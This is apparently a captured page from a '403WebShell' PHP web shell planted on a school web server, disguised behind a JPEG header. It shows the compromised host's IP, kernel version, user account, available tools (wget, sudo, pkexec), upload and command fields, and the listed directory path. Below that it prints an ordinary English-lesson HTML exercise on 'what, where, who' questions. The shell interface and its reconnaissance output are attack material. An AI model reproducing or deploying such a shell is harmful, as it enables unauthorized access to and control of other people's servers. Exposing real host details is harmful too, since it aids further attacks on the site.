????JFIF??x?x????'403WebShell
403Webshell
Server IP : 79.136.114.73  /  Your IP : 18.226.169.66
Web Server : Apache/2.4.7 (Ubuntu) PHP/5.5.9-1ubuntu4.29 OpenSSL/1.0.1f
System : Linux b8009 3.13.0-170-generic #220-Ubuntu SMP Thu May 9 12:40:49 UTC 2019 x86_64
User : www-data ( 33)
PHP Version : 5.5.9-1ubuntu4.29
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/appsrv.astacus.se/apps/school/www_old8/Html/LevelB/Category1/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/appsrv.astacus.se/apps/school/www_old8/Html/LevelB/Category1/LevelBCat1Lesson20.html
<!doctype html>
<html>
    <head>
        <title>Fill in the blanks with 'what where who'</title>
        
        <script type="text/javascript" src="../../../js/allScriptsForLessonsHtml.js"></script>

        <style type="text/css"></style>

        <script>
            
            function page_preLoad()
            {
                shared_setDeviceTypeLevelCategoryLastLesson(Level.B, Category.No1);
                
                shared_set_tblMainiPadBodyWidthHeight('id_tblMainiPadBody', 'id_meta');
                
                shared_setHeaderTable('id_tblHeader', shared_title_page, shared_getSubTitle(Level.B, Category.No1, 20), true, true);
                shared_setFooterTable('id_tblFooter', true, true, true, true, true);
                
                var ids_headings = ['id_td_heading1', 'id_td_heading2'];
                var ids_boxes = ['id_TdSpanWordWhat1Box', 'id_TdSpanWordWhereBox', 'id_TdSpanWordWhat2Box', 'id_TdSpanWordWhat3Box', 'id_TdSpanWordWhat4Box'];
                var ids_options = ['id_td_wordWhat1', 'id_td_wordWhere', 'id_td_wordWho', 'id_td_wordWhat2', 'id_td_wordWhat3', 'id_td_wordWhat4'];
                var ids_texts = ['id_td_text1', 'id_td_text2', 'id_td_text3', 'id_td_text4', 'id_td_text5', 'id_td_text6', 'id_td_text7', 'id_td_text8', 'id_td_text9', 'id_td_text10', 'id_td_text11', 'id_td_text12', 'id_td_text13', 'id_td_text14', 'id_td_text15', 'id_td_text16', 'id_td_text17', 'id_td_text18', 'id_td_text19', 'id_td_text20', 'id_td_text21', 'id_td_text22', 'id_td_text23', 'id_td_text24', 'id_td_text25', 'id_td_text26', 'id_td_text27'];
                var ids_spans = ['id_SpanWordWhat1', 'id_SpanWordWhere', 'id_SpanWordWho', 'id_SpanWordWhat2', 'id_SpanWordWhat3', 'id_SpanWordWhat4'];
                var ids_All = ids_headings.concat(ids_boxes, ids_options, ids_texts);
                
                shared_adjust_fontSize_for_ids_all_devices(ids_All, 80);
                
                shared_init_dropBox_tds_withOUT_drag_here(ids_boxes);
                shared_init_dropping_spans(ids_spans);
                
                shared_hideAllExceptFirstElement('id_SpanWordWhat', 4);
                shared_set_all_draggble_to_false_except_first_element('id_td_wordWhat', 4);
            }
        
            function page_onLoad()
            {
                shared_setTablesHeightsForIE();
            }
        
            function btnPrevious_click()
            {
                window.location = "LevelBCat1Lesson19.html";
            }

            function btnNext_click()
            {
                window.location = "LevelBCat1Lesson21.html";
            }        
        
            function btnHome_click()
            {
                shared_btnHomeCategories_click('LevelB');
            }
        
            function DragDrop(id_dropBox, isWhatWord, ids_array)
            {
                if (shared_isMovingElementIdInTheArraySetIsFilledTrue(id_dropBox, ids_array))
                {
                    shared_setTextAndBackgroundColorToGreenAndIsMovedTrue(shared_currentDropingId, id_dropBox);
                    
                    if (isWhatWord)
                    {
                        showNextWhatWord()
                    }
                    
                    shared_set_currentDropingId_draggbleToFalse();
                }
                else
                {
                    shared_resetCurrentDroppingPosition(id_dropBox);
                }

            }
        
            function showNextWhatWord()
            {                
                shared_unHideNextElementNew2('id_SpanWordWhat', 'id_td_wordWhat', 4);
            }
        
            function btnValidate_click()
            {
                var ids_boxes = ['id_TdSpanWordWhat1Box', 'id_TdSpanWordWhereBox', 'id_TdSpanWordWhat2Box', 'id_TdSpanWordWhat3Box', 'id_TdSpanWordWhat4Box'];
                
                var isAllBoxesFilled = shared_isAllInfosFilled(ids_boxes);
                
                var eTextField1 = document.getElementById('id_td_text20');
                var eTextField2 = document.getElementById('id_td_text21');
                var eTextField3 = document.getElementById('id_td_text22');
                var eTextField4 = document.getElementById('id_td_text23');
                
                if (isAllBoxesFilled && (eTextField1.value != '') && (eTextField2.value != '') && (eTextField3.value != '') && (eTextField4.value != ''))
                {
                    shared_is_all_infos_filled_show_claps_animationWithIsFilled(ids_boxes);
                }
            }
        
            function isNumberKey(event)
            {
                if (event.keyCode >= 48 && event.keyCode <= 57)//It is required for safari.
                {
                    return (true);
                }
                
                return (false);
            }

        </script>
    </head>

    <body onload="page_onLoad()">
        
    <div id="shared_id_div_claps_image">
    </div>
        
    <table id="id_tblMainiPadBody" border="1" cellspacing="0" cellpadding="0">
        <tr height="8%">
            <td>
                <div id="id_tblHeader"></div>
            </td>
        </tr>
        <tr height="*" data-role="page"> <!-- for swiping left and right especially for Android device -->
            <td>
                <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="2%">
                    <tr>
                        <td>
                            <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0">
                                  <tr>
                                    <td>
                                        <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0">
                                          <tr height="100%">
                                            <td>
                                                <table width="100%" height="100%" border="1" cellspacing="0" cellpadding="0">
                                                  <tr height="5%">
                                                    <td style="border-top: 0px; border-left: 0px; border-right: 0px">
                                                        <table border="0"  width="100%" height="100%" cellspacing="0" cellpadding="0">
                                                            <tr>
                                                                <td id="id_td_heading1" width="*" class="shared_style_options_blue_24px_bold">Fill in the blanks with the following options:</td>
                                                          </tr>
                                                        </table>
                                                    </td>
                                                  </tr>
                                                  <tr height="5%">
                                                      <td style="border-top: 0px; border-left: 0px; border-right: 0px">
                                                          <table id="id_tblOptionsSet3" width="100%" height="100%" border="0" cellspacing="0" cellpadding="0">
                                                              <tr>
                                                                  <td id="id_td_heading2" width="*" class="shared_style_options_blue_24px_bold">Options:</td>
                                                                  <td id="id_td_wordWhat1" class="shared_style_red_24px_bold" width="14%" align="center" draggable="true" ondragstart="shared_dragStartNew(event)">
                                                                      <span id="id_SpanWordWhat1" class="cls_SpanWordWhat1">What</span>
                                                                  </td>
                                                                  <td id="id_td_wordWhere" class="shared_style_red_24px_bold" width="14%" align="center" draggable="true" ondragstart="shared_dragStartNew(event)">
                                                                      <span id="id_SpanWordWhere" class="cls_SpanWordWhere">Where</span>
                                                                  </td>
                                                                  <td id="id_td_wordWho" class="shared_style_red_24px_bold" width="14%" align="center" draggable="true" ondragstart="shared_dragStartNew(event)">
                                                                      <span id="id_SpanWordWho" class="cls_SpanWordWho">Who</span>
                                                                  </td>
                                                                  <td id="id_td_wordWhat2" class="shared_style_red_24px_bold" width="14%" align="center" draggable="true" ondragstart="shared_dragStartNew(event)">
                                                                      <span id="id_SpanWordWhat2" class="cls_SpanWordWhat2">What</span>
                                                                  </td>
                                                                  <td id="id_td_wordWhat3" class="shared_style_red_24px_bold" width="14%" align="center" draggable="true" ondragstart="shared_dragStartNew(event)">
                                                                      <span id="id_SpanWordWhat3" class="cls_SpanWordWhat3">What</span>
                                                                  </td>
                                                                  <td id="id_td_wordWhat4" class="shared_style_red_24px_bold" width="14%" align="center" draggable="true" ondragstart="shared_dragStartNew(event)">
                                                                      <span id="id_SpanWordWhat4" class="cls_SpanWordWhat4">What</span>
                                                                  </td>
                                                              </tr>
                                                          </table>
                                                      </td>
                                                  </tr>
                                                  <tr height="*">
                                                    <td style="border-top: 0px; border-left: 0px; border-right: 0px; border-bottom: 0px">
                                                        <table width="100%" height="100%"  border = "0" cellspacing="0" cellpadding="0">
                                                          <tr id="id_tr_wordWhat1Box" height="10%"
                                                              ondragover="shared_highlight('id_TdSpanWordWhat1Box'); shared_allowDrop_web(event)"
                                                              ondragleave="shared_un_highlight('id_TdSpanWordWhat1Box')"
                                                              ondrop="DragDrop('id_TdSpanWordWhat1Box', true, ['id_SpanWordWhat1','id_SpanWordWhat2','id_SpanWordWhat3','id_SpanWordWhat4'])">
                                                              <td width = "100%">
                                                                  <table width="100%" height="100%"  border="0" cellspacing="2%" cellpadding="0">
                                                                      <tr>
                                                                          <td id="id_td_text1" width="10%" class="shared_style_blue_24px_bold" align="right">1. </td>
                                                                          <td id="id_TdSpanWordWhat1Box" width="20%" class="shared_style_red_24px_bold" align="center">_______ </td>
                                                                          <td id="id_td_text2" width="*" class="shared_style_blue_24px_bold">&nbsp; is your name?</td>
                                                                      </tr>
                                                                  </table>
                                                              </td>
                                                          </tr>
                                                          <tr height="10%">
                                                              <td width="100%">
                                                                  <table width="100%" height="100%"  border="0" cellspacing="0" cellpadding="0">
                                                                      <tr>
                                                                          <td id="id_td_text3" width="10%" class="shared_style_blue_24px_bold" align="right">A. </td>
                                                                          <td id="id_td_text4" width="22%" class="shared_style_blue_24px_bold" align="center"> My name is </td>
                                                                          <td width="*" id="id_td_text27" class="shared_style_red_24px_bold">
                                                                              <input type="text" id="id_td_text20" class="shared_style_red_24px_bold" style="width: 73%; text-align:center">
                                                                          </td>
                                                                      </tr>
                                                                  </table>
                                                              </td>
                                                          </tr>
                                                          <tr id="id_tr_wordWhereBox" height="10%"
                                                              ondragover="shared_highlight('id_TdSpanWordWhereBox'); shared_allowDrop_web(event)"
                                                              ondragleave="shared_un_highlight('id_TdSpanWordWhereBox')"
                                                              ondrop="DragDrop('id_TdSpanWordWhereBox', false, ['id_SpanWordWhere'])">
                                                              <td width = "100%">
                                                                  <table width="100%" height="100%"  border="0" cellspacing="2%" cellpadding="0">
                                                                      <tr>
                                                                          <td id="id_td_text5" width="10%" class="shared_style_blue_24px_bold" align="right">2. </td>
                                                                          <td id="id_TdSpanWordWhereBox" width="20%" class="shared_style_red_24px_bold" align="center">_______ </td>
                                                                          <td id="id_td_text6" width="*" class="shared_style_blue_24px_bold"> &nbsp; is your school?</td>
                                                                      </tr>
                                                                  </table>
                                                              </td>
                                                          </tr>
                                                          <tr height="10%">
                                                              <td width="100%">
                                                                  <table width="100%" height="100%"  border="0" cellspacing="0" cellpadding="0">
                                                                      <tr>
                                                                          <td id="id_td_text7" width="10%" class="shared_style_blue_24px_bold" align="right">A. </td>
                                                                          <td id="id_td_text8" width="*" class="shared_style_blue_24px_bold">&nbsp; It is in Begumpet. </td>
                                                                      </tr>
                                                                  </table>
                                                              </td>
                                                          </tr>
                                                          <tr id="id_tr_wordWhat2Box" height="10%"
                                                              ondragover="shared_highlight('id_TdSpanWordWhat2Box'); shared_allowDrop_web(event)"
                                                              ondragleave="shared_un_highlight('id_TdSpanWordWhat2Box')"
                                                              ondrop="DragDrop('id_TdSpanWordWhat2Box', true, ['id_SpanWordWhat1','id_SpanWordWhat2','id_SpanWordWhat3','id_SpanWordWhat4'])">
                                                              <td width = "100%">
                                                                  <table width="100%" height="100%"  border="0" cellspacing="2%" cellpadding="0">
                                                                      <tr>
                                                                          <td id="id_td_text9" width="10%" class="shared_style_blue_24px_bold" align="right">3. </td>
                                                                          <td id="id_TdSpanWordWhat2Box" width="20%" class="shared_style_red_24px_bold" align="center">_______ </td>
                                                                          <td id="id_td_text10" width="*" class="shared_style_blue_24px_bold"> &nbsp; is your mother's name?</td>
                                                                      </tr>
                                                                  </table>
                                                              </td>
                                                          </tr>
                                                          <tr height="10%">
                                                              <td width="100%">
                                                                  <table width="100%" height="100%"  border="0" cellspacing="0" cellpadding="0">
                                                                      <tr>
                                                                          <td id="id_td_text11" width="10%" class="shared_style_blue_24px_bold" align="right">A. </td>
                                                                          <td id="id_td_text12" width="40%" class="shared_style_blue_24px_bold">&nbsp; My mother's name is </td>
                                                                          <td width="*" id="id_td_text26" class="shared_style_red_24px_bold">
                                                                              <input type="text" id="id_td_text21" class="shared_style_red_24px_bold" style="width: 90%; text-align:center">
                                                                          </td>
                                                                      </tr>
                                                                  </table>
                                                              </td>
                                                          </tr>
                                                          <tr id="id_tr_wordWhat3Box" height="10%"
                                                              ondragover="shared_highlight('id_TdSpanWordWhat3Box'); shared_allowDrop_web(event)"
                                                              ondragleave="shared_un_highlight('id_TdSpanWordWhat3Box')"
                                                              ondrop="DragDrop('id_TdSpanWordWhat3Box', true, ['id_SpanWordWhat1','id_SpanWordWhat2','id_SpanWordWhat3','id_SpanWordWhat4'])">
                                                              <td width = "100%">
                                                                  <table width="100%" height="100%"  border="0" cellspacing="2%" cellpadding="0">
                                                                      <tr>
                                                                          <td id="id_td_text13" width="10%" class="shared_style_blue_24px_bold" align="right">4. </td>
                                                                          <td id="id_TdSpanWordWhat3Box" width="20%" class="shared_style_red_24px_bold" align="center">_______ </td>
                                                                          <td id="id_td_text14" width="*" class="shared_style_blue_24px_bold"> &nbsp; is your father's name?</td>
                                                                      </tr>
                                                                  </table>
                                                              </td>
                                                          </tr>
                                                          <tr height="10%">
                                                              <td width="100%">
                                                                  <table width="100%" height="100%"  border="0" cellspacing="0" cellpadding="0">
                                                                      <tr>
                                                                          <td id="id_td_text15" width="10%" class="shared_style_blue_24px_bold" align="right">A. </td>
                                                                          <td id="id_td_text16" width="40%" class="shared_style_blue_24px_bold">&nbsp; My father's name is </td>
                                                                          <td width="*" id="id_td_text25" class="shared_style_red_24px_bold">
                                                                              <input type="text" id="id_td_text22" class="shared_style_red_24px_bold" style="width: 90%; text-align:center">
                                                                          </td>
                                                                      </tr>
                                                                  </table>
                                                              </td>
                                                          </tr>
                                                          <tr id="id_tr_wordWhat4Box" height="10%"
                                                              ondragover="shared_highlight('id_TdSpanWordWhat4Box'); shared_allowDrop_web(event)"
                                                              ondragleave="shared_un_highlight('id_TdSpanWordWhat4Box')"
                                                              ondrop="DragDrop('id_TdSpanWordWhat4Box', true, ['id_SpanWordWhat1','id_SpanWordWhat2','id_SpanWordWhat3','id_SpanWordWhat4'])">
                                                              <td width = "100%">
                                                                  <table width="100%" height="100%"  border="0" cellspacing="2%" cellpadding="0">
                                                                      <tr>
                                                                          <td id="id_td_text17" width="10%" class="shared_style_blue_24px_bold" align="right">5. </td>
                                                                          <td id="id_TdSpanWordWhat4Box" class="shared_style_red_24px_bold" width="20%" align="center">_______ </td>
                                                                          <td id="id_td_text18" width="*" class="shared_style_blue_24px_bold"> &nbsp; is father's/mother's phone number?</td>
                                                                      </tr>
                                                                  </table>
                                                              </td>
                                                          </tr>
                                                          <tr height="*">
                                                              <td width="100%">
                                                                  <table width="100%" height="100%"  border="0" cellspacing="0" cellpadding="0">
                                                                      <tr>
                                                                          <td id="id_td_text19" width="10%" class="shared_style_blue_24px_bold" align="right">A. </td>
                                                                          <td width="50%" id="id_td_text24" class="shared_style_red_24px_bold" align="left">
                                                                              &nbsp; <input type="number" id="id_td_text23" class="shared_style_red_24px_bold" style="width: 85%; text-align:left" onkeypress="return isNumberKey(event)">
                                                                          </td>
                                                                          <td width="*">&nbsp;</td>
                                                                      </tr>
                                                                  </table>
                                                              </td>
                                                          </tr>
                                                        </table>
                                                     </td>
                                                  </tr>
                                                </table>
                                            </td>
                                          </tr>
                                        </table>
                                    </td>
                                  </tr>
                            </table>
                        </td>
                    </tr>
                </table>
            </td>
        </tr>
        <tr height="8%">
            <td>
                <div id="id_tblFooter"></div>
            </td>
        </tr>
    </table>

    <script>
            page_preLoad();
            
            new webkit_draggable('id_SpanWordWhat1', {handle : 'id_td_wordWhat1', revert : true, scroll : false, onStart : function(){shared_dragStartNew(event)}});
            new webkit_draggable('id_SpanWordWhat2', {handle : 'id_td_wordWhat2', revert : true, scroll : false, onStart : function(){shared_dragStartNew(event)}});
            new webkit_draggable('id_SpanWordWhat3', {handle : 'id_td_wordWhat3', revert : true, scroll : false, onStart : function(){shared_dragStartNew(event)}});
            new webkit_draggable('id_SpanWordWhat4', {handle : 'id_td_wordWhat4', revert : true, scroll : false, onStart : function(){shared_dragStartNew(event)}});
            new webkit_draggable('id_SpanWordWhere', {handle : 'id_td_wordWhere', revert : true, scroll : false, onStart : function(){shared_dragStartNew(event)}});
            new webkit_draggable('id_SpanWordWho', {handle : 'id_td_wordWho', revert : true, scroll : false, onStart : function(){shared_dragStartNew(event)}});
            
            webkit_drop.add('id_tr_wordWhat1Box', {onOver : function(){shared_highlight('id_TdSpanWordWhat1Box')}, onOut : function(){shared_un_highlight('id_TdSpanWordWhat1Box')}, onDrop : function(){DragDrop('id_TdSpanWordWhat1Box', true, ['id_SpanWordWhat1','id_SpanWordWhat2','id_SpanWordWhat3','id_SpanWordWhat4'])}});
            webkit_drop.add('id_tr_wordWhat2Box', {onOver : function(){shared_highlight('id_TdSpanWordWhat2Box')}, onOut : function(){shared_un_highlight('id_TdSpanWordWhat2Box')}, onDrop : function(){DragDrop('id_TdSpanWordWhat2Box', true, ['id_SpanWordWhat1','id_SpanWordWhat2','id_SpanWordWhat3','id_SpanWordWhat4'])}});
            webkit_drop.add('id_tr_wordWhat3Box', {onOver : function(){shared_highlight('id_TdSpanWordWhat3Box')}, onOut : function(){shared_un_highlight('id_TdSpanWordWhat3Box')}, onDrop : function(){DragDrop('id_TdSpanWordWhat3Box', true, ['id_SpanWordWhat1','id_SpanWordWhat2','id_SpanWordWhat3','id_SpanWordWhat4'])}});
            webkit_drop.add('id_tr_wordWhat4Box', {onOver : function(){shared_highlight('id_TdSpanWordWhat4Box')}, onOut : function(){shared_un_highlight('id_TdSpanWordWhat4Box')}, onDrop : function(){DragDrop('id_TdSpanWordWhat4Box', true, ['id_SpanWordWhat1','id_SpanWordWhat2','id_SpanWordWhat3','id_SpanWordWhat4'])}});
            webkit_drop.add('id_tr_wordWhereBox', {onOver : function(){shared_highlight('id_TdSpanWordWhereBox')}, onOut : function(){shared_un_highlight('id_TdSpanWordWhereBox')}, onDrop : function(){DragDrop('id_TdSpanWordWhereBox', false, ['id_SpanWordWhere'])}});
            
        </script>

    </body>
</html>

Youez - 2016 - github.com/yon3zu
LinuXploit